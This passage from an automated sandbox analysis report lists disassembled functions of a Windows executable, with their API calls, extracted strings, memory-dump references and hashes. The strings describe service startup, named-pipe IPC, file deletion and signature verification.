                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?,A11C6AE6,?,00000008), ref: 0041F537
                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000001), ref: 0041F53F
                                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 0041F585
                                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 0041F5C9
                                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 0041F646
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000019.00000002.2709445495.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709362323.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709604551.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709659543.00000000004C4000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709701311.00000000004C5000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710169833.00000000005E8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710258044.0000000000658000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710298093.000000000065B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710335665.0000000000663000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710380381.0000000000666000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710420594.000000000066B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710485860.000000000066E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710523084.0000000000674000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710564371.0000000000679000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710608002.00000000006A8000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710646490.00000000006AB000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710694404.00000000006D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_25_2_400000_678f1ad3-4458-46d8-ad95-b8d4b2696f10.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CriticalSection$Leave$EnterSleep
                                                                                                                                                                                                                                                                    • String ID: CommBridge$Data size %i is larger than max buffer size, aborting write.$OOBEUtils$Out pipe handle is invalid, aborting write.$Pipe %p not initialized, aborting write.$Terminate channel$Writing data packet to pipe failed with error code %i$Writing info packet to pipe failed with error code %i$`J
                                                                                                                                                                                                                                                                    • API String ID: 4275215032-318403239
                                                                                                                                                                                                                                                                    • Opcode ID: 8abe9bf9aa2a41506b6c831e74ff08ca7d922cea81cd4335f7d1f82bf08bb469
                                                                                                                                                                                                                                                                    • Instruction ID: 357453fb2a3021c3316a4f80364e3140d53479557ee8387c2b372fbbb1bee486
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8abe9bf9aa2a41506b6c831e74ff08ca7d922cea81cd4335f7d1f82bf08bb469
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F2E10770B40208ABDB00DF65DD4ABDE7BB5AF45700F24013AF806A72D1DB7CAA458B5D
                                                                                                                                                                                                                                                                    Function 004056B0 Relevance: 24.8, APIs: 4, Strings: 10, Instructions: 296sleepCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000001F4,?,?,?,?,?,?,00000028), ref: 0040587F
                                                                                                                                                                                                                                                                      • Part of subcall function 0041FA30: WaitForSingleObject.KERNEL32(00000008,000000FF,00000000,00000008,00405984,?,?,?,?,?,?,?,?,?,00000028), ref: 0041FB10
                                                                                                                                                                                                                                                                      • Part of subcall function 0041FA30: CloseHandle.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,00000028), ref: 0041FB19
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    • Successfully created the client thread, xrefs: 004059E8
                                                                                                                                                                                                                                                                    • Failed in initial handshake with the client, xrefs: 004058F0
                                                                                                                                                                                                                                                                    • thread failed to resumed. fatal error, xrefs: 0040594C
                                                                                                                                                                                                                                                                    • failed to create a new thread for ipc communications. Fatal Error, xrefs: 0040591A
                                                                                                                                                                                                                                                                    • Failed in creating client thread, xrefs: 00405984
                                                                                                                                                                                                                                                                    • Initializing Communication Channel with ACC with pipename: %s, xrefs: 00405862
                                                                                                                                                                                                                                                                    • CreateIPCChannel failed for pipe %s, xrefs: 004058D0
                                                                                                                                                                                                                                                                    • Problem initializing Communication Channel. Quitting. Error code %d, xrefs: 004058A7
                                                                                                                                                                                                                                                                    • Failed to sent communnication ID packet to the client, xrefs: 004059B9
                                                                                                                                                                                                                                                                    • Sent communnication ID packet to the client, xrefs: 004056EF
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000019.00000002.2709445495.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709362323.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709604551.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709659543.00000000004C4000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709701311.00000000004C5000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710169833.00000000005E8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710258044.0000000000658000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710298093.000000000065B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710335665.0000000000663000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710380381.0000000000666000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710420594.000000000066B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710485860.000000000066E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710523084.0000000000674000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710564371.0000000000679000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710608002.00000000006A8000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710646490.00000000006AB000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710694404.00000000006D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_25_2_400000_678f1ad3-4458-46d8-ad95-b8d4b2696f10.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CloseHandleObjectSingleSleepWait
                                                                                                                                                                                                                                                                    • String ID: CreateIPCChannel failed for pipe %s$Failed in creating client thread$Failed in initial handshake with the client$Failed to sent communnication ID packet to the client$Initializing Communication Channel with ACC with pipename: %s$Problem initializing Communication Channel. Quitting. Error code %d$Sent communnication ID packet to the client$Successfully created the client thread$failed to create a new thread for ipc communications. Fatal Error$thread failed to resumed. fatal error
                                                                                                                                                                                                                                                                    • API String ID: 640476663-1070437462
                                                                                                                                                                                                                                                                    • Opcode ID: 68fa43ea2eba1087806099fb0bd63b4327f9badd3dddcdc44e0fb38c4a85424d
                                                                                                                                                                                                                                                                    • Instruction ID: dce432d37da255bfcb33f67ab20813508531a13952796c9d494c823ab279c1dd
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 68fa43ea2eba1087806099fb0bd63b4327f9badd3dddcdc44e0fb38c4a85424d
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F0A1D2B0A40615AFCB00DF65DC86B6E7BA4FF49704F10017AE505AB3D1DB78A914CB9A
                                                                                                                                                                                                                                                                    Function 00401A30 Relevance: 24.8, APIs: 5, Strings: 9, Instructions: 268synchronizationthreadCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(00000000,00000001,?,00401A1C), ref: 00401AC7
                                                                                                                                                                                                                                                                      • Part of subcall function 00401770: SetServiceStatus.ADVAPI32(004C8C64), ref: 00401821
                                                                                                                                                                                                                                                                      • Part of subcall function 00401770: GetLastError.KERNEL32 ref: 00401877
                                                                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,00401520,00000000,00000000,00000000), ref: 00401B0D
                                                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,00401A1C), ref: 00401C91
                                                                                                                                                                                                                                                                    • ResetEvent.KERNEL32(?,?,?,?,?,?,?,?,00401A1C), ref: 00401C99
                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00401A1C), ref: 00401D13
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000019.00000002.2709445495.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709362323.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709604551.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709659543.00000000004C4000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709701311.00000000004C5000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710169833.00000000005E8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710258044.0000000000658000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710298093.000000000065B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710335665.0000000000663000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710380381.0000000000666000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710420594.000000000066B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710485860.000000000066E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710523084.0000000000674000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710564371.0000000000679000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710608002.00000000006A8000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710646490.00000000006AB000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710694404.00000000006D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_25_2_400000_678f1ad3-4458-46d8-ad95-b8d4b2696f10.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorLast$CloseCreateEventHandleObjectResetServiceSingleStatusThreadWait
                                                                                                                                                                                                                                                                    • String ID: NULL OOBE_Event_t object passed in DestroyEvent $NULL OOBE_Event_t object passed in WaitforEvent $OOBEEvents$OOBEUtils$SvcInit: Creat thread failed$SvcInit: Create thread successful$SvcInit: Finished$SvcInit: Now wating for the close signal$SvcInit: Started New
                                                                                                                                                                                                                                                                    • API String ID: 2548555128-2125176678
                                                                                                                                                                                                                                                                    • Opcode ID: fdb8e43f0c7796d05782fa09c5a4e7a52c29433dbb338b57c4b152e7f49b068c
                                                                                                                                                                                                                                                                    • Instruction ID: f73ab4652ae81edbc98d7fd2a5d95e0b0f6ab9935acceea9d8e153ccbd849a11
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fdb8e43f0c7796d05782fa09c5a4e7a52c29433dbb338b57c4b152e7f49b068c
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9291D370B80315ABE710DB559D46B5E3BA4EB10B14F14017BF915B73D1EFB8A9008BAE
                                                                                                                                                                                                                                                                    Function 00427320 Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 148fileCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • PathFileExistsW.SHLWAPI(00000000,00000000,0040674D), ref: 0042732E
                                                                                                                                                                                                                                                                    • PathIsDirectoryW.SHLWAPI(00000000), ref: 00427347
                                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(00000000,00000000,?), ref: 0042735A
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0042736C
                                                                                                                                                                                                                                                                    • GetFileAttributesW.KERNEL32(00000000), ref: 00427386
                                                                                                                                                                                                                                                                    • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 00427420
                                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(00000000), ref: 00427431
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00427456
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 004274A6
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000019.00000002.2709445495.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709362323.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709604551.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709659543.00000000004C4000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709701311.00000000004C5000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710169833.00000000005E8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710258044.0000000000658000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710298093.000000000065B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710335665.0000000000663000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710380381.0000000000666000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710420594.000000000066B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710485860.000000000066E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710523084.0000000000674000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710564371.0000000000679000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710608002.00000000006A8000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710646490.00000000006AB000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710694404.00000000006D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_25_2_400000_678f1ad3-4458-46d8-ad95-b8d4b2696f10.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: File$ErrorLast$AttributesDeletePath$DirectoryExists
                                                                                                                                                                                                                                                                    • String ID: Failed to delete file: '%s' LastError:%d$File '%s' is with read-only. Its attribute is: '%d'. UnSetting its read-only attr and retry deleting$FileUtils$OOBEUtils
                                                                                                                                                                                                                                                                    • API String ID: 2466363971-4107796821
                                                                                                                                                                                                                                                                    • Opcode ID: 00b6d3bf9a951ad68e80268370d137a51b95931526897c450c14d293331eb804
                                                                                                                                                                                                                                                                    • Instruction ID: 1d99e2006965ff6694df6736826d9ecfdb84e75553d3c6a76360acde75f41734
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 00b6d3bf9a951ad68e80268370d137a51b95931526897c450c14d293331eb804
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3341A530745221EBCA10DF19FD99A5A7B65FB85B01BA40477F80197290DB78BC90CBBD
                                                                                                                                                                                                                                                                    Function 00427AB0 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 182encryptionmemoryCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • WinVerifyTrust.WINTRUST(000000FF,?*@`J,?,A11C6AE6,?,?), ref: 00427B84
                                                                                                                                                                                                                                                                    • WTHelperProvDataFromStateData.WINTRUST(00000000), ref: 00427B95
                                                                                                                                                                                                                                                                    • WTHelperGetProvSignerFromChain.WINTRUST(00000000,00000000,00000000,00000000), ref: 00427BAA
                                                                                                                                                                                                                                                                    • WTHelperGetProvCertFromChain.WINTRUST(00000000,00000000), ref: 00427BCA
                                                                                                                                                                                                                                                                    • CertGetNameStringW.CRYPT32(?,00000004,00000000,00000000,00000000,00000000), ref: 00427C07
                                                                                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000000), ref: 00427C22
                                                                                                                                                                                                                                                                    • CertGetNameStringW.CRYPT32(?,00000004,00000000,00000000,00000000,?), ref: 00427C41
                                                                                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,00000000,-00000002), ref: 00427C6A
                                                                                                                                                                                                                                                                    • WinVerifyTrust.WINTRUST(000000FF,00AAC56B,00000034), ref: 00427D07
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000019.00000002.2709445495.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709362323.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709604551.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709659543.00000000004C4000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709701311.00000000004C5000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710169833.00000000005E8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710258044.0000000000658000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710298093.000000000065B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710335665.0000000000663000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710380381.0000000000666000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710420594.000000000066B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710485860.000000000066E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710523084.0000000000674000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710564371.0000000000679000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710608002.00000000006A8000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710646490.00000000006AB000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710694404.00000000006D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_25_2_400000_678f1ad3-4458-46d8-ad95-b8d4b2696f10.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CertFromHelperProv$ChainDataLocalNameStringTrustVerify$AllocFreeSignerState
                                                                                                                                                                                                                                                                    • String ID: 4$?*@`J${|}
                                                                                                                                                                                                                                                                    • API String ID: 318076659-843163469
                                                                                                                                                                                                                                                                    • Opcode ID: 2b2f03a0b2219b9638c237f0a50e4636c7e99644d9adfce77a164d3a7e6bd346
                                                                                                                                                                                                                                                                    • Instruction ID: 07a7e49040c28470832a96e5ee50d6d3bb65460ac79225f476d81bb8c7a89be8
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2b2f03a0b2219b9638c237f0a50e4636c7e99644d9adfce77a164d3a7e6bd346
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 69717BB0E00218AFEB14DFA5DD89B9EBBB8FB04314F10416EE515AB281DBB95944CF58
                                                                                                                                                                                                                                                                    Function 0041E190 Relevance: 19.8, APIs: 6, Strings: 7, Instructions: 309COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?,?,?,?), ref: 0041E231
                                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 0041E288
                                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 0041E2DC
                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(0036EE80), ref: 0041E302
                                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(0036EE80), ref: 0041E37D
                                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(00000009), ref: 0041F2F9
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000019.00000002.2709445495.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709362323.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709604551.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709659543.00000000004C4000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709701311.00000000004C5000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
